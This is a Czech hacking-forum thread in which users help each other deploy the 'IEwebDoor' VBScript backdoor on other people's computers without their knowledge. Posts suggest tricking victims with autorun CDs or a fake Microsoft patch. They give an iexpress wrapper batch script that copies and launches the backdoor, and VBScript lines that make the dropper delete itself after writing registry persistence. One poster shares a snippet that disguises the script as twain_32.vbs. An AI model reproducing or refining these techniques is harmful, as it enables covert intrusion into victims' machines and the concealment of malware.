| Dobrý den,chtěl jsem se zeptat,jestli někdo neznáte způsob nebo script ,jak docílit toho,aby se například ten IEWebDoor spustil hned,když ho uživatel dostane do svého počítače.Nemusel bych tedy čekat na to,až uživatel script spustí.Což se často ani nestane.Na googlu jsem nic o samospuštění kromě autorun nenašel,tak se obracím na vás.Nešlo by to třeba tím autorunem?
----------
Niemand ist so gut,wie er denkt ;) (odpovědět) | |
|
|
| Autorunem by to samozřejmě šlo. Vypálíš CD s nějakým obsahem + backdoor, položíš to vedle jeho dveří, nebo mu to pošleš poštou a je to :)
Když chceš docílit automatického spuštění například po odeslání mailu nebo při návštěvě www stránky, musíš si zjistit nějakou chybu, kterou nemá uživatel zazáplatovánu ve webovém browseru nebo v mailovém klientu. Toto ale už není tak jednoduché. Musíš si o uživatelově systému zjistit dost informací a to nemluvím o tom, že pokud se jedná o známou chybu, kterou chceš využít, pak musí být hodně čerstvá a nebo musí být uživatel děsně IT negramotnej, aby nestahoval záplaty.
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem. (odpovědět) | |
|
|
| Myslím, že se dá použít docela dobře sociotechnika - co třeba záplata od Microsoftu? (odpovědět) | Fisi |  | 13.7.2006 13:49 |
|
|
|
| tím chci říct že uživatel to spustí sám;)
jenom se chci zeptat:jak muzu zasifrovat ten soubor *.vbs aby při zobrazení v texťáku nebyl vidět zdroják? (odpovědět) | Fisi |  | 13.7.2006 13:51 |
|
|
|
| zabal to pomoci iexpress a dej tam spousteci cmd script:
@echo off
copy IEwebDoor.vbs "c:\bootinfo.vbs"
start c:\bootinfo.vbs
del c:\bootinfo.vbs (odpovědět) | |
|
|
| zdravim potrebuji vedet nejake prikazy do vbs napr automaticke spusteni atd... dekuji a nejlepe nejakou stranku ohledne techto prikazu jsem zacatecnik (odpovědět) | Strup | 85.71.69.* | 30.7.2007 17:46 |
|
|
|
| Jo a ještě ten script s tim souborem od iewebdoor zabal pomoci iexpress a jako instalacni soubor nastav nazev toho scriptu (odpovědět) | |
|
|
| Fisi: Zašifrovat to bohužel nemůžeš, musel bys to napsat v jiném jazyku, ale nejspíš by se to dalo hodit do ADS a tím to dostatečně skrýt. Pokud ti ale jde o to, aby to nemohl v texťáku otevřít někdo, komu to teprve podstrkuješ, tak by bylo možné vytvořit program, který by sloužil pouze jako zavaděč, který by rozšifroval zašifrovaný obsah IEwebDOORu a uložil jej na HDD objěti. Nemělo by to být nic těžkého, pár řádků kódu...
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem. (odpovědět) | |
|
|
| .cCuMiNn. myslis ze bych mohl na konec skriptu umistit del vbscript.vbs ? ze by se po spusteni toho scriptu ten script sam vymazal? zustala by tam pak v jeho pocitaci jen ta kopie ze?
----------
Niemand ist so gut,wie er denkt ;) (odpovědět) | |
|
|
| No já si to nemyslim, protože ta kopie je ten samej soubor a má stejnej kód. Tím pádem by se smazala po spuštění i kopie :( (odpovědět) | |
|
|
| Darth: Jj, toto by určitě šlo. Jen bys to neměl dávat na konec toho scriptu, ale spíše před návrat z funkce bStartReg(). Chtělo by to tam umístit, tento řádek kódu:
objFso.DeleteFile strJmenoSoubor, True
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem. (odpovědět) | |
|
|
| Function bStartReg()
bStartReg = true
objFso.DeleteFile strIEwebDOOR, True
End function
zkraceno...asi takhle to tam dat? ja vbs neumim sry tak se radsi ptam...
----------
Niemand ist so gut,wie er denkt ;) (odpovědět) | |
|
|
| Darth: Vlož to před tento řádek:
If Err.Number = 0 Then WScript.Quit
ale k vymazání dojde, pouze pokud zahnízdění proběhlo bez problému. Pokud se nepodaří vytvořit kopii a záznam v registrech, tak se to nevymaže, muselo by se to umístit i na jiná místa ve scriptu.
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem. (odpovědět) | |
|
|
| JJ takze je to vlastne i takova kontrola jestli doslo ke spravnemu behu scriptu.Pokud se smaze muzu se radovat pokud ne muzu hledat chybu...to se taky hodi...dik moc ;) btw rulezzni projekt fakt smekam je to super ;)
----------
Niemand ist so gut,wie er denkt ;) (odpovědět) | |
|
|
| ještě takový malý doplněk : je toto dobre? strSranda ? ten script se jmenuje Sranda.vbs .Nema se tam zadavat pripona .vbs nebo tak? se radsi ptam nez bych neco udelal spatne :)
----------
Niemand ist so gut,wie er denkt ;) (odpovědět) | |
|
|
| Darth: Vlastně ještě oprava, ten řádek
If Err.Number = 0 Then WScript.Quit
nahraď tímto kódem:
If Err.Number = 0
objFso.DeleteFile strIEwebDOOR, True
WScript.Quit
End If
Toto už by mělo být bez problému...
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem. (odpovědět) | |
|
|
| Nemel bych vymazat i to predchozi End if ? Je tam
If Err.Number = 0 Then WScript.Quit
End If
Kdyz si ten prikaz napsal i s tim End If tak ten s tim starym prikazem bych mel taky smazat ze?
----------
Niemand ist so gut,wie er denkt ;) (odpovědět) | |
|
|
| Darth: Ne, ten tam nechej - budou tam dva za sebou. Ten End, o kterém se zmiňuješ patří k jinému If - podle zarovnání uhodneš k jakému.
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem. (odpovědět) | |
|
|
| A jeste jedna vec...jak poznam ze se mi uz provedl prikaz ktery sem zadal na klienta?pustil sem si za ucelem zkouseni ten script na svem pc..ted sem zadal autodestroy dal ulozit a nic se nedeje..interval mam nastaveny na jednu minutu...jak poznam ze se prikaz vykonal?
----------
Niemand ist so gut,wie er denkt ;) (odpovědět) | |
|
|
| WshShell.Run strCesta, 0, false
objFso.DeleteFile strIEwebDOOR, True
If Err.Number = 0
objFso.DeleteFile strSranda, True
WScript.Quit
End If
End If
bStartReg = true
End function
takto to nyni vypada...
----------
Niemand ist so gut,wie er denkt ;) (odpovědět) | |
|
|
| druhy radek uz tam neni omlouvam se :)
----------
Niemand ist so gut,wie er denkt ;) (odpovědět) | |
|
|
| Vse uz je vyreseno omlouvam se za spam :)
----------
Niemand ist so gut,wie er denkt ;) (odpovědět) | |
|
|
| Vse probehlo v poradku ale script se nevymazal :( btw za tim if to chtelo jeste Then
----------
Niemand ist so gut,wie er denkt ;) (odpovědět) | |
|
|
| Darth: jak tam máš strSranda, tak to vrať zpět na strJmenoSoubor. Nevšiml jsem si toho, že jsi to přejmenoval na strIEwebDOOR :) (odpovědět) | |
|
|
| .cCuMiNn. je boreeeeeeec ono to fungujeee :D respekt ;)
----------
Niemand ist so gut,wie er denkt ;) (odpovědět) | |
|
|
| Já to mám ve svém skriptu takhle:
fx_soubor = WScript.ScriptFullName
fx_adr = "C:\WINDOWS\twain_32.vbs"
Set fso = CreateObject("Scripting.FileSystemObject")
if fx_soubor <> adr_adr then
fso.DeleteFile(fx_soubor)
End If (odpovědět) | |
|
|
| prosím vás napište mi nějaké příkazy pls jsem začátečník (odpovědět) | Mareelsaan | 213.168.183.* | 2.1.2008 16:58 |
|
|
|